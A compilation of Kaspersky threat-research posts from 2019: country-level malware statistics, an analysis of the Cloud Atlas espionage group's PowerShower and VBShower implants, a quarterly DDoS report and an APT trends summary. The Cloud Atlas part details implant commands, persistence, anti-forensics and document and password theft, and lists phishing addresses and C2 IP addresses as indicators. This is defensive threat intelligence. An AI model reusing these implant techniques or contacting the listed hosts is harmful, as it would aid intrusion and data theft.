The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks.

To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In Q2 2019, Kaspersky solutions defeated 717,057,912 attacks launched from online resources located in 203 countries across the globe. 217,843,293 unique URLs triggered Web Anti-Virus components.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of web-based attack sources by country, Q2 2019 (download)

This quarter, Web Anti-Virus was most active on resources located in the US. Overall, the Top 4 remained unchanged from the previous quarter.

Countries where users faced the greatest risk of online infection

To assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.

This rating only includes attacks by malicious objects that fall under the Malware class; it does not include Web Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

Country* % of attacked users** 1 Algeria 20.38 2 Venezuela 19.13 3 Albania 18.30 4 Greece 17.36 5 Moldova 17.30 6 Bangladesh 16.82 7 Estonia 16.68 8 Azerbaijan 16.59 9 Belarus 16.46 10 Ukraine 16.18 11 France 15.84 12 Philippines 15.46 13 Armenia 15.40 14 Tunisia 15.29 15 Bulgaria 14.73 16 Poland 14.69 17 Réunion 14.68 18 Latvia 14.65 19 Peru 14.50 20 Qatar 14.32

* Excluded are countries with relatively few Kaspersky users (under 10,000).
** Unique users targeted by Malware-class attacks as a percentage of all unique users of Kaspersky products in the country.

These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data.

On average, 12.12% of Internet user computers worldwide experienced at least one Malware-class attack during the quarter.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of malicious web-based attacks, Q2 2019 (download)

Local threats

Statistics on local infections of user computers are an important indicator. They include objects that penetrated the target computer through infecting files or removable media, or initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.).

Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media.

In Q2 2019, our File Anti-Virus detected 240,754,063 malicious and potentially unwanted objects.

Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.

Note that as of this quarter, the rating includes only Malware-class attacks; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

Country* % of attacked users** 1 Afghanistan 55.43 2 Tajikistan 55.27 3 Uzbekistan 55.03 4 Yemen 52.12 5 Turkmenistan 50.75 6 Laos 46.12 7 Syria 46.00 8 Myanmar 45.61 9 Mongolia 45.59 10 Ethiopia 44.95 11 Bangladesh 44.11 12 Iraq 43.79 13 China 43.60 14 Bolivia 43.47 15 Vietnam 43.22 16 Venezuela 42.71 17 Algeria 42.33 18 Cuba 42.31 19 Mozambique 42.14 20 Rwanda 42.02

These statistics are based on detection verdicts returned by the OAS and ODS Anti-Virus modules received from users of Kaspersky products who consented to provide statistical data. The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera memory cards, phones, or external hard drives.

* Excluded are countries with relatively few Kaspersky users (under 10,000).
** Unique users on whose computers Malware-class local threats were blocked, as a percentage of all unique users of Kaspersky products in the country.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of local threats, Q2 2019 (download)

Overall, 22.35% of user computers globally faced at least one Malware-class local threat during Q2.

The figure for Russia was 26.14%.

Recent Cloud Atlas activity

12 Srpen, 2019 - 12:00

Also known as Inception, Cloud Atlas is an actor that has a long history of cyber-espionage operations targeting industries and governmental entities. We first reported Cloud Atlas in 2014 and we’ve been following its activities ever since.

From the beginning of 2019 until July, we have been able to identify different spear-phishing campaigns related to this threat actor mostly focused on Russia, Central Asia and regions of Ukraine with ongoing military conflicts.

Countries targeted by Cloud Atlas recently

Cloud Atlas hasn’t changed its TTPs (Tactic Tools and Procedures) since 2018 and is still relying on its effective existing tactics and malware in order to compromise high value targets.

The Windows branch of the Cloud Atlas intrusion set still uses spear-phishing emails to target high profile victims. These emails are crafted with Office documents that use malicious remote templates – whitelisted per victims – hosted on remote servers. We described one of the techniques used by Cloud Atlas in 2017 and our colleagues at Palo Alto Networks also wrote about it in November 2018.

Previously, Cloud Atlas dropped its “validator” implant named “PowerShower” directly, after exploiting the Microsoft Equation vulnerability (CVE-2017-11882) mixed with CVE-2018-0802. During recent months, we have seen a new infection chain, involving a polymorphic HTA, a new and polymorphic VBS implant aimed at executing PowerShower, and the Cloud Atlas second stage modular backdoor that we disclosed five years ago in our first blogpost about them and which remains unchanged.

Let’s meet PowerShower

PowerShower, named and previously disclosed by Palo Alto Networks in their blogspot (see above), is a malicious piece of PowerShell designed to receive PowerShell and VBS modules to execute on the local computer. This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage. The differences in the two versions reside mostly in anti-forensics features for the validator version of PowerShower.

The PowerShower backdoor – even in its later developments – takes three commands:

Command Description 0x80 (Ascii “P”) It is the first byte of the magic PK. The implant will save the received content as a ZIP archive under %TEMP%\PG.zip. 0x79 (Ascii “O”) It is the first byte of “On resume error”. The implant saves the received content as a VBS script under “%APPDATA%\Microsoft\Word\[A-Za-z]{4}.vbs” and executes it by using Wscript.exe Default If the first byte doesn’t match 0x80 or 0x79, the content is saved as an XML file under “%TEMP%\temp.xml”. After that, the script loads the content of the file, parses the XML to get the PowerShell commands to execute, decodes them from Base64 and invokes IEX.
After executing the commands, the script deletes “%TEMP%\temp.xml” and sends the content of “%TEMP%\pass.txt” to the C2 via an HTTP POST request.

A few modules deployed by PowerShower have been seen in the wild, such as:

  • A PowerShell document stealer module which uses 7zip (present in the received PG.zip) to pack and exfiltrate *.txt, *.pdf, *.xls or *.doc documents smaller than 5MB modified during the last two days;
  • A reconnaissance module which retrieves a list of the active processes, the current user and the current Windows domain. Interestingly, this feature is present in PowerShower but the condition leading to the execution of that feature is never met in the recent versions of PowerShower;
  • A password stealer module which uses the opensource tool LaZagne to retrieve passwords from the infected system.

We haven’t yet seen a VBS module dropped by this implant, but we think that one of the VBS scripts dropped by PowerShower is a dropper of the group’s second stage backdoor documented in our article back in 2014.

And his new friend, VBShower

During its recent campaigns, Cloud Atlas used a new “polymorphic” infection chain relying no more on PowerShower directly after infection, but executing a polymorphic HTA hosted on a remote server, which is used to drop three different files on the local system.

  • A backdoor that we name VBShower which is polymorphic and replaces PowerShower as a validator;
  • A tiny launcher for VBShower ;
  • A file computed by the HTA which contains contextual data such as the current user, domain, computer name and a list of active processes.

This “polymorphic” infection chain allows the attacker to try to prevent IoC-based defence, as each code is unique by victim so it can’t be searched via file hash on the host.

The VBShower backdoor has the same philosophy of the validator version of PowerShower. Its aim is to complicate forensic analysis by trying to delete all the files contained in “%APPDATA%\..\Local\Temporary Internet Files\Content.Word” and “%APPDATA%\..\Local Settings\Temporary Internet Files\Content.Word\”.

Once these files have been deleted and its persistence is achieved in the registry, VBShower sends the context file computed by the HTA to the remote server and tries to get via HTTP a VBS script to execute from the remote server every hour.

At the time of writing, two VBS files have been seen pushed to the target computer by VBShower. The first one is an installer for PowerShower and the second one is an installer for the Cloud Atlas second stage modular backdoor which communicates to a cloud storage service via Webdav.

Final words

Cloud Atlas remains very prolific in Eastern Europe and Central Asia. The actor’s massive spear-phishing campaigns continue to use its simple but effective methods in order to compromise its targets.

Unlike many other intrusion sets, Cloud Atlas hasn’t chosen to use open source implants during its recent campaigns, in order to be less discriminating. More interestingly, this intrusion set hasn’t changed its modular backdoor, even five years after its discovery.

IoCs Some emails used by the attackers
  • infocentre.gov@mail.ru
  • middleeasteye@asia.com
  • simbf2019@mail.ru
  • world_overview@politician.com
  • infocentre.gov@bk.ru
VBShower registry persistence
  • Key : HKCU\Software\Microsoft\Windows\CurrentVersion\Run\[a-f0-9A-F]{8}
  • Value : wscript //B “%APPDATA%\[A-Za-z]{5}.vbs”
VBShower paths
  • %APPDATA%\[A-Za-z]{5}.vbs.dat
  • %APPDATA%\[A-Za-z]{5}.vbs
  • %APPDATA%\[A-Za-z]{5}.mds
VBShower C2s
  • 176.31.59.232
  • 144.217.174.57

DDoS attacks in Q2 2019

5 Srpen, 2019 - 12:00

News overview

The second quarter of 2019 turned out to be richer than the first in terms of high-profile DDoS attacks. True, most of the campaigns that attracted media attention appeared to be politically, rather than commercially, motivated — and that despite the fact that some security experts discern a clear fall in hacktivism in recent years.

Let’s begin with an attack that is technically outside the chronological framework of this report, since it took place on March 5 (but was reported in early May). It was targeted against a computer system regulating the supply of electricity to various districts of Los Angeles and Salt Lake City. Power supply systems in California and Wyoming also experienced problems. This is a relatively rare case of an attack on a power grid in a densely populated area. The attack was large-scale, but relatively primitive. It did not cause any power outages, but there were “disruptions in the normal operation of the systems,” as the US Department of Energy described the incident. As to the purpose and perpetrators of the attack, no information was forthcoming.

In the second half of April, there were also numerous DDoS attacks against Ecuador. As stated by the country’s deputy minister for information and communications, the websites of public institutions experienced 40 million cyber attacks of various kinds, including DDoS. The web pages of the Central Bank, the Ministry of Foreign Affairs, and the Presidential Office suffered the most. The wave of attacks was hacktivist in nature: the attackers were protesting the new government’s decision to strip Julian Assange of political asylum. To cope with the onslaught of digital indignation, Ecuador had to seek help from Israeli experts.

In early June, a powerful DDoS attack hit Telegram. The attack was carried out primarily from Chinese IP addresses, which gave founder Pavel Durov reason to link it to the demonstrations in Hong Kong; in his words, the political opposition there uses Telegram to organize protests, which Beijing takes a very dim view of.

The only headline attack this quarter seemingly driven by commercial considerations targeted video game developer Ubisoft on June 18 — just before the release of its new Operation Phantom Sight expansion for the game Rainbow Six Siege. It caused connection problems for many players, and even provoked calls on Reddit for better DDoS protection.

The largest would-be DDoS attack in Q2 turned out to be a false alarm. In late June, some segments of the Internet experienced operational issues worthy of a major DDoS offensive, but the actual cause lay elsewhere. As it turned out, a small ISP in Pennsylvania had made a configuration error, turning itself into a priority route for some Cloudflare traffic. The provider could not handle the load, and thousands of websites serviced by Cloudflare went down as a result. The WhatsApp and Instagram malfunctions were also attributed to this. It is worth noting that such Internet outages happen quite often; in this case, the scale of the problem and the involvement of Cloudflare led to speculation about a potential DDoS attack.

Meanwhile, law enforcement agencies continue to work on reducing the number of DDoS attacks within their zone of responsibility. For instance, late March saw the arrest of 19-year-old Englishman Liam Reece Watts, accused of two attacks against the websites of Greater Manchester and Cheshire police.

Note also that this quarter confirmed our earlier hypothesis about the link between the decline in the number of DDoS attacks and the rising popularity of cryptocurrency mining : NSFOCUS published a 2018 report that drew a clear correlation between the fluctuations in cryptocurrency prices and the number of DDoS attacks.

Quarter trends

According to Kaspersky DDoS Protection data, this quarter turned out to be rather less eventful than the previous one. As such, the number of attacks foiled by our protection systems fell by 44 p.p. This lull is readily explained by the traditional summer decline in cybercriminal activity. That said, compared with Q2 2018, the total number of attacks actually increased by 18 p.p., which confirms our theory about the recovery of the DDoS market. The growth trend observed since the beginning of 2019 still persists.

It should be noted that the seasonal drop in activity had little impact on attacks more technically complex (both to organize and repel): their share fell by only 4 p.p. against the previous quarter. But compared to the same period last year, the difference is significant and upward — in Q2 2019 “smart” attacks saw 32 p.p. growth. The share of such attacks among all others continues to rise steadily: It increased both against last quarter (by 9 p.p.) and Q2 2018 (by 15 p.p.).

The duration of DDoS sessions also continues to grow steadily in absolute and relative terms (the longest of the defeated attacks, which was also the longest smart attack, lasted for 75 minutes — an impressive figure given that most attacks in this segment get filtered in the early stages). In many ways, the overall growth is due to the increased duration of technically complex attacks, whose average and maximum times grew against both the previous quarter and, even more so, the previous year.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Comparison of the number and duration of standard and smart attacks for Q2 2018, Q1 2019 and Q2 2019 (download)

Therefore, the traditional spring/summer quarter decline can be put down to the drop in the share of non-smart attacks, since it is a time when amateur DDoSers are sitting exams and lying on the beach.

In the world of professional cybercriminals, the picture is different: the indicators for more complex and hence dangerous attacks show steady growth. This is especially evident when compared with the same period last year. The growth relative to Q1 is also clear to see, although less dramatic (as we predicted in our previous quarterly report). The latest figures already point to a stable trend. It will be very interesting to observe how the situation unfolds over the next trimester: will we see further growth, or will the market stabilize at the current level?

Statistics Methodology

Kaspersky Lab has a long history of combating cyber threats, including DDoS attacks of all types and complexity. Company experts monitor botnets using the Kaspersky DDoS Intelligence system.

A part of Kaspersky DDoS Protection, the DDoS Intelligence system intercepts and analyzes commands received by bots from C&C servers. The system is proactive, not reactive, meaning that it does not wait for a user device to get infected or a command to be executed.

This report contains DDoS Intelligence statistics for Q2 2019.

In the context of this report, the incident is counted as a single DDoS-attack only if the interval between botnet activity periods does not exceed 24 hours. For example, if the same web resource was attacked by the same botnet with an interval of 24 hours or more, then this is considered as two attacks. Bot requests originating from different botnets but directed at one resource also count as separate attacks.

The geographical locations of DDoS-attack victims and C&C servers used to send commands are determined by their respective IP addresses. The number of unique targets of DDoS attacks in this report is counted by the number of unique IP addresses in the quarterly statistics.

DDoS Intelligence statistics are limited to botnets detected and analyzed by Kaspersky Lab. Note that botnets are just one of the tools used for DDoS attacks, and that this section does not cover every single DDoS attack that occurred during the review period.

Quarter summary
  • In this quarter, China once again was the most targeted region by number of attacks (63.80%), followed by the US (17.57%) and Hong Kong (4.61%).
  • There was little movement in the Top 3, but lower down there again appeared countries not usually associated with high levels of DDoS activity — this time it was the Netherlands (4th with 1.54%) and Taiwan (7th with 1.15%).
  • The Top 10 by number of unique targets generally coincides with the ranking by number of attacks: China (55.17%), US (22.22%), and Hong Kong (4.53%) make up the podium here again. They are joined by Taiwan (1.61%) and Ireland (1%).
  • This quarter’s choppiest month was April, which included peak attack time; the quietest was May immediately after.
  • Statistically, the biggest share of attacks came on Monday (17.55%), while Sunday was the calmest day (10.45%).
  • The longest attack (509 hours) in Q2 significantly outperformed the previous quarter’s leader, and set an all-time record since these reports began. Despite that, the overall proportion of prolonged attacks declined this quarter.
  • The largest share of junk traffic in Q2 still consisted of SYN flooding (82.43%), followed by UDP (10.94%). However, HTTP and TCP traffic swapped places: the latter nudged ahead on 3.26%, while the former scored only 2.77%.
  • The shares of Windows- and Linux-based botnets barely changed against the previous quarter.
  • The geographical rating list by number of botnet C&C servers is dominated by the US (44.14%), followed by the Netherlands (12.16%) and the UK (9.46%). Interestingly, this quarter’s Top 10 had no place for Russia.
Attack geography

The Top 3 countries by number of attacks against targets in a particular country remained almost unchanged this quarter: China is still in first place, although its share dropped by about 4 p.p. to 63.80%. In second place is the US with practically the same share as before (17.57%), while third place goes to Hong Kong (4.61%), whose contribution to the total number of cyber attacks also changed very little.

The trend of past quarters continues, with the Top 10 again hosting some unexpected guests. This time, they were the Netherlands, ranked fourth with 1.54%, and Taiwan in seventh position with a 1.15% slice. But whereas the Netherlands is not a complete stranger to the Top 10, having entered in 2016 and flirted with it on other occasions, the result represents significant growth in Taiwan’s indicators.

The Top 10 said goodbye to France and Saudi Arabia, and Canada dropped from fourth to eighth, although in numerical terms its share actually rose to 0.93%. The leaderboard was propped up by Vietnam (0.68%), while the UK rose one position to sixth (1.20%). Singapore remains in fifth place, although its share also climbed (to 1.25%).

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of DDoS attacks by country, Q1 and Q2 2019 (download)

The distribution of the number of unique targets corresponds more or less to the distribution of the number of attacks. The first four places coincide: China posted 55.17% (down, again by about 4 p.p.), the US 22.22% (up by about 1 p.p.), Hong Kong 4.53% (down by a slender 0.2 p.p.), and the Netherlands 2.34% (a significant change, since the country was nowhere to be seen in last quarter’s Top 10).

As for the remaining Top 10 permutations, besides the Netherlands, Taiwan took sixth place (1.61%) and Ireland came ninth with a share of 1%. Meanwhile, Poland, Germany, and Saudi Arabia departed the Top 10, while France (0.9%) dropped from seventh place to last, despite losing only 0.1 p.p.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of unique DDoS-attack targets by country, Q1 and Q2 2019 (download)

Dynamics of the number of DDoS attacks

The second quarter, like the first, was relatively calm, with no sudden spikes. The most activity was observed at the beginning of the quarter, and peak day was April 8 (538 attacks). This was followed by a gradual decline throughout the following month, with calmest day being May 9 (79 attacks). In early June, DDoS attack organizers perked up somewhat, but the end of the month saw another slump.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Dynamics of the number of DDoS attacks in Q2 2019 (download)

The most dangerous weekday in Q2 from a DDoS perspective was Monday (17.55%), snatching the laurel wreath from Saturday. This bucked the trend of recent quarters in which the greatest activity was observed in the middle and at the end of the week. Sunday remains the quietest day (10.45%), and there is also relative calm on Fridays (13.11%). All other days of the week, the attacks are spread more or less evenly.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of DDoS attacks by day of the week, Q1 and Q2 2019 (download)

Duration and types of DDoS attacks

The longest attack in Q2 2019 lasted 509 hours (a fraction over 21 days), and was directed against Chinese telecom operator China Unicom. It is the longest attack ever recorded in this series of quarterly reports. Last quarter’s longest attack was approximately 1.7 times shorter (289 hours).

Despite the new record, the overall share of long-duration attacks this quarter declined significantly. Only attacks lasting from 100 to 139 hours (0.11%) remained at the same level, while the share of attacks of 140 hours or more almost halved (from 0.21 to 0.13%). Most significantly of all, the share of medium-duration attacks — from 50 to 99 hours — was slashed by almost two-thirds, accounting for 0.54% of all attacks against last quarter’s figure of 1.51%. The proportion of 5–19 hour attacks fell only slightly.

Accordingly, the share of attacks of no more than four hours increased: from 78.66% to 82.69%.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of DDoS attacks by duration (hours), Q1 and Q2 2019 (download)

In terms of DDoS-attack types, SYN flooding is still the most popular, although its share dipped by roughly 1.5 p.p. against the previous quarter to 82.43%. In second place is UDP flooding, whose figure, on the contrary, climbed by 2 p.p. to 10.94%. TCP requests rose to third place with a share of 3.26%, while the percentage of HTTP traffic, conversely, fell to 2.77%. Last place still belongs to ICMP flooding, with a share of 0.59%.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of DDoS attacks by type, Q2 2019 (download)

The distribution of botnet attacks by family remains roughly the same as in the previous quarter, with assaults against Linux systems still ahead by a wide margin. Although Xor activity faded once more, this decline was more than offset by the rise in the number of Mirai-based attacks.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Ratio of Windows/Linux botnet attacks, Q1 and Q2 2019 (download)

Botnet distribution geography

In terms of geographical distribution of botnet C&C servers, the US (44.14%) remains on top. It is joined in the Top 10 by the Netherlands (12.16%) and the UK (9.46%). China only managed fifth position (4.95%), while South Korea’s share (1.80%) was only good enough for second-to-last place. In addition, this quarter’s Top 10 welcomed Greece (1.35%), but pushed out Romania and, far more surprisingly, Russia.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of botnet C&C servers by country, Q2 2019 (download)

Conclusion

As in several past quarters, the Top 10 geographical distributions continue to amaze. This may be not only because DDoS masterminds are looking for new places where the arm of the law is not so long and electricity prices are not too high, but because the threshold for breaking into the Top 10 is quite low. As a rule, the Top 3 leaders scoop up most of the attacks, so the shares of all other regions remain relatively small. That being the case, even small fluctuations can lead to a country rocketing up or down the rating lists.

True, this cannot completely account for the vanishing act of traditional leaders like South Korea and Russia (the latter’s absence in the Top 10 by number of C&C botnets is particularly striking). If the rearrangement is genuinely linked to a tightening of the legal screws, we should expect the rating lists to feature countries with poorly developed cybercrime laws.

The lack of DDoS spikes this quarter is clearly due to seasonal fluctuations; the summer months are traditionally more serene, if only relatively speaking.

APT trends report Q2 2019

1 Srpen, 2019 - 12:00

For two years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They aim to highlight the significant events and findings that we feel people should be aware of.

This is our latest installment, focusing on activities that we observed during Q2 2019.

Readers who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact ‘intelreports@kaspersky.com’.

The most remarkable findings

In April, we published our report on TajMahal, a previously unknown APT framework that has been active for the last five years. This is a highly sophisticated spyware framework that includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents, and cryptography key stealers; and even its own file indexer for the victim’s computer. We discovered up to 80 malicious modules stored in its encrypted Virtual File System – one of the highest numbers of plugins we have ever seen in an APT toolset. The malware features its own indexer, emergency C2s, the ability to steal specific files from external drives when they become available again, and much more. There are two different packages, self-named ‘Tokyo’ and ‘Yokohama’ and the targeted computers we found include both packages. We think the attackers used Tokyo as the first stage infection, deploying the fully functional Yokohama package on interesting victims, and then leaving Tokyo in place for backup purposes. So far, our telemetry has revealed just a single victim, a diplomatic body from a country in Central Asia. This begs the question, why go to all that trouble for just one victim? We think there may be other victims that we haven’t found yet. This theory is supported by the fact that we couldn’t see how one of the files in the VFS was used by the malware, opening the door to the possibility of additional versions of the malware that have yet to be detected.

On May 14, FT reported that a zero-day vulnerability in WhatsApp had been exploited, allowing attackers to eavesdrop on users, read their encrypted chats, turn on the microphone and camera and install spyware that allows even further surveillance, such as browsing through a victim’s photos and videos, accessing their contact list and more. In order to exploit the vulnerability, the attacker simply needs to call the victim via WhatsApp. This specially crafted call can trigger a buffer overflow in WhatsApp, allowing an attacker to take control of the application and execute arbitrary code in it. Apparently, the attackers used this method to not only snoop on people’s chats and calls but also to exploit previously unknown vulnerabilities in the operating system, which allowed them to install applications on the device. The vulnerability affects WhatsApp for Android prior to 2.19.134, WhatsApp Business for Android prior to 2.19.44, WhatsApp for iOS prior to 2.19.51, WhatsApp Business for iOS prior to 2.19.51, WhatsApp for Windows Phone prior to 2.18.348 and WhatsApp for Tizen prior to 2.18.15. WhatsApp released patches for the vulnerability on May 13. Some have suggested that the spyware may be Pegasus, developed by Israeli company NSO.

Russian-speaking activity

We continue to track the activities of Russian-speaking APT groups. These groups usually show a particular interest in political activities, but apart from a couple of interesting exceptions we failed to detect any remarkable examples during the last quarter.

We did find a potential connection between Hades and a leak at the RANA institute. Hades is possibly connected to the Sofacy threat actor, most notable for being behind Olympic Destroyer, as well as ExPetr and several disinformation campaigns such as the Macron leaks. Earlier this year, a website named Hidden Reality published leaks allegedly related to an Iranian entity named the RANA institute. This was the third leak in two months that disclosed details of alleged Iranian threat actors and groups. Close analysis of the materials, the infrastructure and the dedicated website used by those behind the leak led us to believe that these leaks might be connected to Hades. This might be part of a disinformation campaign in which Hades helps to raise doubts about the quality of the information leaked in other cases from earlier this year.

Zebrocy continued adding new tools to its arsenal using various kinds of programming languages. We found Zebrocy deploying a compiled Python script, which we call PythocyDbg, within a Southeast Asian foreign affairs organization: this module primarily provides for the stealthy collection of network proxy and communications debug capabilities. In early 2019, Zebrocy shifted its development efforts with the use of Nimrod/Nim, a programming language with syntax resembling both Pascal and Python that can be compiled down to JavaScript or C targets. Both the Nim downloaders that the group mainly uses for spear-phishing, and other Nim backdoor code, are currently being produced by Zebrocy and delivered alongside updated compiled AutoIT scripts, Go, and Delphi modules. The targets of this new Nimcy downloader and backdoor set includes diplomats, defense officials and ministry of foreign affairs staff, from whom they want to steal login credentials, keystrokes, communications, and various files. The group appears to have turned its attention towards the March events involving Pakistan and India, and unrelated diplomatic and military officials, while maintaining ongoing access to local and remote networks belonging to Central Asian governments.

We also recently observed some interesting new artifacts that we relate to Turla with varying degrees of confidence.

In April 2019, we observed a new COMpfun-related targeted campaign using new malware. The Kaspersky Attribution Engine shows strong code similarities between the new family and the old COMpfun. Moreover, the original COMpfun is used as a downloader in one of the spreading mechanisms. We called the newly identified modules Reductor after a .pdb path left in some samples. We believe the malware was developed by the same COMPfun authors that, internally, we tentatively associated with the Turla APT, based on victimology. Besides the typical RAT functions (upload, download, execute files), Reductor’s authors put a lot of effort into manipulating installed digital root certificates and marking outbound TLS traffic with unique host-related identifiers. The malware adds embedded root certificates to the target host and allows operators to add additional ones remotely through a named pipe. The solution used by Reductor’s developers to mark TLS traffic is the most ingenious part. The authors don’t touch the network packets at all; instead they analyze Firefox source and Chrome binary code to patch the corresponding system pseudo-random number generation (PRNG) functions in the process’s memory. Browsers use PRNG to generate the “client random” sequence during the very beginning of the TLS handshake. Reductor adds the victims’ unique encrypted hardware- and software-based identifiers to this “client random” field.

Additionally we identified a new backdoor that we attribute with medium confidence to Turla. The backdoor, named Tunnus, is .NET-based malware with the ability to run commands or perform file actions on an infected system and send the results to its C2. So far, the C2 infrastructure has been built using compromised sites with vulnerable WordPress installations. According to our telemetry, Tunnus’s activity started last March and was still active at the time of writing.

ESET has also reported PowerShell scripts being used by Turla to provide direct, in-memory loading and execution of malware. This is not the first time this threat actor has used PowerShell in this way, but the group has improved these scripts and is now using them to load a wide range of custom malware from its traditional arsenal. The payloads delivered via the PowerShell scripts – the RPC backdoor and PowerStallion – are highly customized.

